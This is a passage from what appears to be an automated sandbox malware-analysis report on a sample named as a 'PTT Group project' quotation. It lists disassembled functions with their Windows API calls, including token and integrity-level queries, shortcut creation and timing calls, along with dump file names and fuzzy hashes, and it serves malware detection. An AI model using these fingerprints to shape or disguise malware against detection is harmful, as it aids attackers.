PostMessageW.USER32(?,00000202,00000000), ref: 00968FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00968FDA

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: b047f5572605c142161c1100b02a7a90f588dc6ff851c281a50acf2760c969b2
Instruction ID: 8c93fb77fee1468dcc4598945f42d336ad829062b874987efe36c6eb996d2c13
Opcode Fuzzy Hash: b047f5572605c142161c1100b02a7a90f588dc6ff851c281a50acf2760c969b2
Instruction Fuzzy Hash: B131CE71504219EFDF14CFA8D94CA9F7BBAEB44316F10422AF925EA1D0CBB09954DB90

Function 0096B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0096B6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0096B6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0096B71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0096B742
_wcsstr.LIBCMT ref: 0096B74C

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 831cbd72782291b1d7fdb06e0a008df0edcc971244e9fb8ef231d69779ea1e5e
Instruction ID: f00c068a587fd51ab30a51a631eb8687c44a27bb74bad3c0104f57e0bd34b328
Opcode Fuzzy Hash: 831cbd72782291b1d7fdb06e0a008df0edcc971244e9fb8ef231d69779ea1e5e
Instruction Fuzzy Hash: 6D210832204204BBEB255B39DC49E7BBBACDF89720F10403AFD05CA1A1FF61DC8096A0

Function 0099B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00912612: GetWindowLongW.USER32(?,000000EB), ref: 00912623

GetWindowLongW.USER32(?,000000F0), ref: 0099B44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0099B471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0099B489
GetSystemMetrics.USER32(00000004), ref: 0099B4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00981184,00000000), ref: 0099B4D0

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 5e53c076bf1cd51a4ed2469026680bc7c31f3ddeed12e04f1e89506558de8a3d
Instruction ID: 5da931298d95b3c997dc5e20d7f2e1f1e49ea0e79a2767acd164a37905cae007
Opcode Fuzzy Hash: 5e53c076bf1cd51a4ed2469026680bc7c31f3ddeed12e04f1e89506558de8a3d
Instruction Fuzzy Hash: 6B219171624255AFCF109F3CED08A6A77A8EB45721F114B39F926C61F1E7389850FB90

Function 009697E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00969802

Part of subcall function 00917D2C: _memmove.LIBCMT ref: 00917D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00969834
__itow.LIBCMT ref: 0096984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00969874
__itow.LIBCMT ref: 00969885

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 52d26c9d81ad7f72e92fd0b31135bd29584881a74abacda241ce0f6433fb81e0
Instruction ID: 6d1b772cbfd843d735ea90ea24730ff8d8c41c1f626f84a1be6e53e32346f1c1
Opcode Fuzzy Hash: 52d26c9d81ad7f72e92fd0b31135bd29584881a74abacda241ce0f6433fb81e0
Instruction Fuzzy Hash: DF219531B00208BBEF109BA59C8AFEE7BBDEF8A714F044029FD05DB291D6708D459791

Function 009112F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0091134D
SelectObject.GDI32(?,00000000), ref: 0091135C
BeginPath.GDI32(?), ref: 00911373
SelectObject.GDI32(?,00000000), ref: 0091139C

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: ca649ea1bfaa5e0db79886989d59d3a5b14c8b2b2fe927c2f5ae825fea4227df
Instruction ID: c575c85fbc7ae1e4c966d98d36622c8dfe30c713047453418d13acfe45fdabe1
Opcode Fuzzy Hash: ca649ea1bfaa5e0db79886989d59d3a5b14c8b2b2fe927c2f5ae825fea4227df
Instruction Fuzzy Hash: B7216A70969308EFDB119F69EC047A97BBCFB10362F148227F921965A4D37198D2FB90

Function 0096C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0096C176
_memcmp.LIBCMT ref: 0096C194
_memcmp.LIBCMT ref: 0096C1A7
_memcmp.LIBCMT ref: 0096C1BF
_memcmp.LIBCMT ref: 0096C1D7

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: e9a62ab5889e5afd88e37afcb2a89c38c6ae0dbad092103b7915190308de2bd5
Instruction ID: 0656207c6460f174676aa24d53027e55024b474637cee3e283c3c084b16d99c3
Opcode Fuzzy Hash: e9a62ab5889e5afd88e37afcb2a89c38c6ae0dbad092103b7915190308de2bd5
Instruction Fuzzy Hash: B401B5F260D1067BE204A7245C42FBB735C9BA33ACF454021FD45A6293E651EE1186E0

Function 00974D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00974D5C
__beginthreadex.LIBCMT ref: 00974D7A
MessageBoxW.USER32(?,?,?,?), ref: 00974D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00974DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00974DAC

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 254da158eef8bb8c0a8c9a34cb7ee0262643db86d852495d62ce40211ce8c77d
Instruction ID: 02f3047a289e1e757c7a438f6d0cdaebcff3cedd2d21e53537ec36e3990a1a42
Opcode Fuzzy Hash: 254da158eef8bb8c0a8c9a34cb7ee0262643db86d852495d62ce40211ce8c77d
Instruction Fuzzy Hash: 8D11087791C248BFC7119BACDC04A9A7FACEB85320F148266F928D3291D7759D4097A0

Function 0096874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00968766
GetLastError.KERNEL32(?,0096822A,?,?,?), ref: 00968770
GetProcessHeap.KERNEL32(00000008,?,?,0096822A,?,?,?), ref: 0096877F
HeapAlloc.KERNEL32(00000000,?,0096822A,?,?,?), ref: 00968786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0096879D

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: e3881c68e5409886b12ddfa6a93a01a632ce609e9447117efdbeb184243b56a9
Instruction ID: 8697db9751bad60d99b89a69368f49a22340d3bf745bdda503c45988ca24fae6
Opcode Fuzzy Hash: e3881c68e5409886b12ddfa6a93a01a632ce609e9447117efdbeb184243b56a9
Instruction Fuzzy Hash: E9016D71218208FFDB204FAADC98D6BBBACFF89355720053AF849D2260DA318C00DA60

Function 009754E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00975502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00975510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00975518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00975522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0097555E

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: f341b95092e934a77b89bba466da1d844e281694da0ef8f56b4e5f7df5d9b827
Instruction ID: 00142df7cda8da7f9886dc6c70f8ae9332aa3b27ae882928e860c645970b1c57
Opcode Fuzzy Hash: f341b95092e934a77b89bba466da1d844e281694da0ef8f56b4e5f7df5d9b827
Instruction Fuzzy Hash: 4A018B32C18A29DBCF50DFE8E848AEDFB79FB08711F064456E805F2140CB708550DBA1

Function 00967652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0096758C,80070057,?,?,?,0096799D), ref: 0096766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0096758C,80070057,?,?), ref: 0096768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0096758C,80070057,?,?), ref: 00967698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0096758C,80070057,?), ref: 009676A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0096758C,80070057,?,?), ref: 009676B4

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 66752061ee637c87c480482c675f0b47e522abeecb094df620bc1f2e6b5e3daf
Instruction ID: ad489cbf28a84169a2dd9a13721a77b1ebc4cd3a2162cddd46a4c9152497be58
Opcode Fuzzy Hash: 66752061ee637c87c480482c675f0b47e522abeecb094df620bc1f2e6b5e3daf
Instruction Fuzzy Hash: 0301D472614608BBDB104F9DDC08BAAFBACEB44B95F100129FD06D2211E771DD5097B0

Function 009685F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00968608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00968612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00968621
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00968628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0096863E

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 594f3bbe4c9f7c35849ca9aa78e4ee5c502d351f24f4c163f4e9a1d89bbdcd62
Instruction ID: dc821ee1430f05e82aaffd2f620e4296ff02d894dcccbfafef35d352329bbd86
Opcode Fuzzy Hash: 594f3bbe4c9f7c35849ca9aa78e4ee5c502d351f24f4c163f4e9a1d89bbdcd62
Instruction Fuzzy Hash: CFF06231255204BFEB200FA9DC9DE6F7BACEF89754B104626F945C6160CB719C41EA60

Function 00968652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00968669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00968673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00968682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00968689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0096869F

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 0e8632c78360ffb346a96aeffc3dd660063c5c9c744b83b4032394320992fbb9
Instruction ID: 363c165d30bbbf33a0a372ac487b40b75b579cfd23148b50d47bb05d38c1d6dd
Opcode Fuzzy Hash: 0e8632c78360ffb346a96aeffc3dd660063c5c9c744b83b4032394320992fbb9
Instruction Fuzzy Hash: 62F06271214304BFEB211FA9EC99E6B7BACEF89758B100127F945C6150CB71DD41EA60

Function 0096C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0096C6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 0096C6D1
MessageBeep.USER32(00000000), ref: 0096C6E9
KillTimer.USER32(?,0000040A), ref: 0096C705
EndDialog.USER32(?,00000001), ref: 0096C71F

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: bdbf01f5da5b915d5817c9d0d9e5a5dd7e1cc98d45c8e925d38bd0b5b01bb80c
Instruction ID: f67e177760b9e7c36882f8956c1225f6199006b117299daf230b3b66828da773
Opcode Fuzzy Hash: bdbf01f5da5b915d5817c9d0d9e5a5dd7e1cc98d45c8e925d38bd0b5b01bb80c
Instruction Fuzzy Hash: 4501D6B0514708ABEB205B64EC5EFA6B7BCFF00701F04066AF582E10E0DBF4A9949F80

Function 009113B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 009113BF
StrokeAndFillPath.GDI32(?,?,0094BAD8,00000000,?), ref: 009113DB
SelectObject.GDI32(?,00000000), ref: 009113EE
DeleteObject.GDI32 ref: 00911401
StrokePath.GDI32(?), ref: 0091141C

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 3ee1c4525a433adfb535fb0a46766b91dd25c4439c059d8a8b2fa0631627a4a8
Instruction ID: a8c6d76411990d70866451f69ac708a2e74fb2b0b98f549e5909629b95917a89
Opcode Fuzzy Hash: 3ee1c4525a433adfb535fb0a46766b91dd25c4439c059d8a8b2fa0631627a4a8
Instruction Fuzzy Hash: EDF03C3016D308EBDB155F6AED0C7987FA8A701366F04C226E52A840F1C73149E5FF50

Function 0097C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0097C69D
CoCreateInstance.OLE32(009A2D6C,00000000,00000001,009A2BDC,?), ref: 0097C6B5

Part of subcall function 00917F41: _memmove.LIBCMT ref: 00917F82

CoUninitialize.OLE32 ref: 0097C922

Strings

.lnk, xrefs: 0097C631, 0097C659, 0097C663

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: b4aedb7071f87cb427799d45715bf97d2bd9f5d8e93d6c5d5781e217a12fbd97
Instruction ID: fedc39ab9252cdf4e60762ec85804e97f307b1182ac33149dba40da6843b452e
Opcode Fuzzy Hash: b4aedb7071f87cb427799d45715bf97d2bd9f5d8e93d6c5d5781e217a12fbd97
Instruction Fuzzy Hash: 6AA11C71208209AFD700EF54C891EABB7ECEFD9704F00495DF196971A2DB71EA49CB52

Function 00922E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00930FF6: std::exception::exception.LIBCMT ref: 0093102C
Part of subcall function 00930FF6: __CxxThrowException@8.LIBCMT ref: 00931041

Part of subcall function 00917F41: _memmove.LIBCMT ref: 00917F82

Part of subcall function 00917BB1: _memmove.LIBCMT ref: 00917C0B

__swprintf.LIBCMT ref: 0092302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00922EC6

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 9cac5a776f515ae856b301b77c3025a5234b591734f638c1648438e92f945ad1
Instruction ID: 6daf1450d6e1942f18b0349825baf3dc8399294d262665f1e1d3e05debb2250f
Opcode Fuzzy Hash: 9cac5a776f515ae856b301b77c3025a5234b591734f638c1648438e92f945ad1
Instruction Fuzzy Hash: 60917F716083159FC718EF24E895DAEB7B8EF85700F40491DF885972A5DB34EE48CB62

Function 0097BBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 009148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009148A1,?,?,009137C0,?), ref: 009148CE

CoInitialize.OLE32(00000000), ref: 0097BC26
CoCreateInstance.OLE32(009A2D6C,00000000,00000001,009A2BDC,?), ref: 0097BC3F
CoUninitialize.OLE32 ref: 0097BC5C

Part of subcall function 00919997: __itow.LIBCMT ref: 009199C2
Part of subcall function 00919997: __swprintf.LIBCMT ref: 00919A0C

Strings

.lnk, xrefs: 0097BC08, 0097BC16

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
